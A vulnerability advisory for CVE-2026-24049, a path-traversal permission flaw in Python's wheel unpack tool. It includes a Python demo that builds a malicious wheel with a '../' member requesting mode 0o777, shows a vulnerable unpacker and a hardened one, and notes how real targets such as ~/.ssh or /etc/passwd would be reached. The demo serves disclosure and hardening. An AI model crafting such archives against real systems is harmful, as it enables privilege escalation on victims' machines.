wheel 0.40.0 to 0.46.1: Permission Bypass via malicious wheel, PrivEsc
CVE-2026-24049 Published on January 22, 2026

wheel Allows Arbitrary File Permission Modification via Path Traversal
wheel is a command line tool for manipulating Python wheel files, as defined in PEP 427. In versions 0.40.0 through 0.46.1, the unpack function is vulnerable to arbitrary file permission modification because it mishandles file permissions after extraction: the extraction step sanitizes the member path, but the subsequent chmod is applied to the unsanitized filename taken from the archive header. An attacker can craft a wheel whose member names contain path traversal sequences so that, when unpacked, it changes the permissions of files outside the unpack directory (e.g., /etc/passwd, SSH keys, config files), enabling privilege escalation or arbitrary code execution by making otherwise protected scripts writable. Because chmod only succeeds on files owned by the unpacking user (or on any file when run as root), the practical impact depends on who runs the unpack. This issue has been fixed in version 0.46.2.
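The following is an added, self-contained model of the pattern described above; it is not wheel's own code and the member names (`../escaped.txt`, `pkg/module.py`) and the scratch-directory layout are constructed for the demonstration. It builds a wheel-like zip whose member name walks out of the unpack directory and requests mode 0o777, then runs a vulnerable unpacker (chmod on dest joined with the raw archive name) and a hardened one (reject absolute or `..` members up front, and chmod only the path `ZipFile.extract` actually wrote) against a victim file that lives outside the destination.

```python
import stat
import tempfile
import zipfile
from pathlib import Path

# Constructed sample data (hypothetical names, not a real package).
ESCAPE_NAME = "../escaped.txt"   # traversal member: aims at dest/../escaped.txt
SAFE_NAME = "pkg/module.py"      # ordinary member
REQUESTED_MODE = 0o777           # mode the attacker wants applied to the victim


def build_malicious_wheel(path: Path) -> None:
    """Write a zip with one benign member and one traversal member whose
    Unix mode bits (top 16 bits of external_attr) request 0o777."""
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr(SAFE_NAME, "print('hello')\n")
        info = zipfile.ZipInfo(ESCAPE_NAME)
        info.external_attr = (stat.S_IFREG | REQUESTED_MODE) << 16
        zf.writestr(info, "x\n")


def unpack_vulnerable(wheel: Path, dest: Path) -> None:
    """Flawed pattern: ZipFile.extract() strips '..' components, so the data
    lands inside dest, but the chmod uses dest/<raw name>, which resolves
    outside dest (and an absolute member name replaces dest entirely)."""
    with zipfile.ZipFile(wheel) as zf:
        for zinfo in zf.filelist:
            zf.extract(zinfo, dest)
            mode = zinfo.external_attr >> 16 & 0o777
            dest.joinpath(zinfo.filename).chmod(mode)  # unsanitized name


def unpack_hardened(wheel: Path, dest: Path) -> None:
    """Hardened form: refuse absolute or '..' member names before touching
    the filesystem, chmod only the path extract() returned, and re-check
    that the resolved path is still under dest."""
    dest_resolved = dest.resolve()
    with zipfile.ZipFile(wheel) as zf:
        for zinfo in zf.filelist:
            raw = Path(zinfo.filename)
            if raw.is_absolute() or ".." in raw.parts:
                raise ValueError(f"member escapes destination: {zinfo.filename!r}")
            written = Path(zf.extract(zinfo, dest)).resolve()
            if dest_resolved not in written.parents:
                raise ValueError(f"extracted outside destination: {written}")
            mode = zinfo.external_attr >> 16 & 0o777
            if mode:
                written.chmod(mode)


def demo() -> dict:
    """Run both unpackers in a scratch directory and report what happened to
    a 0o600 file that sits next to (not inside) the unpack directory."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        wheel = root / "evil-1.0-py3-none-any.whl"
        build_malicious_wheel(wheel)

        outside = root / "escaped.txt"      # the victim: sibling of dest
        outside.write_text("secret\n")
        outside.chmod(0o600)

        dest = root / "dest"
        dest.mkdir()
        unpack_vulnerable(wheel, dest)
        mode_after_vuln = stat.S_IMODE(outside.stat().st_mode)

        outside.chmod(0o600)
        dest2 = root / "dest2"
        dest2.mkdir()
        try:
            unpack_hardened(wheel, dest2)
            rejected = False
        except ValueError:
            rejected = True
        mode_after_hardened = stat.S_IMODE(outside.stat().st_mode)

        return {
            "outside_mode_after_vulnerable": mode_after_vuln,
            "hardened_rejected": rejected,
            "outside_mode_after_hardened": mode_after_hardened,
        }


if __name__ == "__main__":
    r = demo()
    print(f"vulnerable unpack: victim mode is now {r['outside_mode_after_vulnerable']:o}")
    print(f"hardened unpack rejected wheel: {r['hardened_rejected']}, "
          f"victim mode still {r['outside_mode_after_hardened']:o}")
```

The victim file here is a sibling of the unpack directory; an attacker targeting a real system would use enough `../` components, or an absolute member name, to reach a path such as the victim's `~/.ssh` or a script on their PATH. Running the demo as root is what turns this into the /etc/passwd case the advisory mentions, since chmod on a file you do not own fails for an unprivileged user.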


Vulnerability Analysis

CVE-2026-24049 is exploitable with local access and requires user interaction (the victim must unpack the attacker-supplied wheel). Attack complexity is rated low. A public proof-of-concept (PoC) exploit exists for CVE-2026-24049. A successful exploit is rated as having no impact on confidentiality and a high impact on integrity and availability.

Attack Vector: LOCAL
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: REQUIRED
Scope: UNCHANGED
Confidentiality Impact: NONE
Integrity Impact: HIGH
Availability Impact: HIGH

Weakness Types

What is a Directory traversal Vulnerability?

The software uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the software does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

CVE-2026-24049 has been classified as a Directory traversal vulnerability or weakness.

Incorrect Permission Assignment for Critical Resource

The product specifies permissions for a security-critical resource in a way that allows that resource to be read or modified by unintended actors. When a resource is given a permissions setting that provides access to a wider range of actors than required, it could lead to the exposure of sensitive information, or the modification of that resource by unintended parties. This is especially dangerous when the resource is related to program configuration, execution or sensitive user data.


Products Associated with CVE-2026-24049


Affected Versions

pypa wheel (0.40.0 through 0.46.1; fixed in 0.46.2)

Red Hat products shipping an affected wheel:
Red Hat Discovery 2 for RHEL 10
Red Hat Ansible Automation Platform 2.5 for RHEL 8
Red Hat Discovery 2 for RHEL 8
Red Hat Ansible Automation Platform 2.5 for RHEL 9
Red Hat Ansible Automation Platform 2.6 for RHEL 9
Red Hat Discovery 2 for RHEL 9
Red Hat Enterprise Linux AppStream (v. 8)
Red Hat Enterprise Linux AppStream EUS (v.9.4)
Red Hat Enterprise Linux AppStream EUS (v.9.6)
Red Hat Enterprise Linux AppStream (v. 9)
Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)
Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)
Red Hat Enterprise Linux CRB (v. 8)
Red Hat CodeReady Linux Builder EUS (v.9.4)
Red Hat CodeReady Linux Builder EUS (v.9.6)
Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)
Red Hat Network Observability (NETOBSERV) 1.11.2
Red Hat AI Inference Server 3.2
Red Hat Ansible Automation Platform 2.6
Red Hat Developer Hub 1.8
Red Hat Discovery 2
Red Hat OpenShift AI 2.25
Red Hat OpenShift AI 3.3
Red Hat OpenShift AI 3.4
Red Hat OpenShift Container Platform 4.16
Red Hat OpenShift Container Platform 4.17
Red Hat OpenShift Container Platform 4.18
Red Hat OpenShift Container Platform 4.19
Red Hat OpenShift Container Platform 4.20
Red Hat OpenShift Container Platform 4.21
Red Hat OpenShift Dev Spaces 3.27
Red Hat OpenStack 1.5
Red Hat Quay 3.12
Red Hat Quay 3.13
Red Hat Quay 3.14
Red Hat Quay 3.15
Red Hat Quay 3.16
Red Hat Quay 3.1
Red Hat Quay 3.9
Red Hat Satellite 6.18
Red Hat Trusted Artifact Signer 1.2
Red Hat Trusted Artifact Signer 1.3
Logging Subsystem for Red Hat OpenShift
Red Hat Migration Toolkit for Virtualization
Red Hat OpenShift Lightspeed
Red Hat Advanced Cluster Security 4
Red Hat AI Inference Server
Red Hat Ansible Automation Platform 2
Red Hat Enterprise Linux 6
Red Hat Enterprise Linux AI (RHEL AI) 3
Red Hat OpenShift AI (RHOAI)
Red Hat OpenShift Container Platform 4
Red Hat OpenShift Dev Spaces
Red Hat Ansible Automation Platform 2.6 for RHEL 10
Red Hat Fence Agents Remediation Operator
Red Hat Multicluster Engine for Kubernetes
Red Hat OpenShift Service Mesh 2
Red Hat OpenShift Service Mesh 3
Red Hat Ansible Automation Platform Ansible Core 2
Red Hat Enterprise Linux 10
Red Hat Enterprise Linux 7
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 9
Red Hat Quay 3
Red Hat Satellite 6
Red Hat Service Telemetry Framework 1.5

Exploit Probability

EPSS: 0.28%
Percentile: 19.35%

EPSS (Exploit Prediction Scoring System) scores estimate the probability that a vulnerability will be exploited in the wild within the next 30 days. The percentile shows you how this score compares to all other vulnerabilities.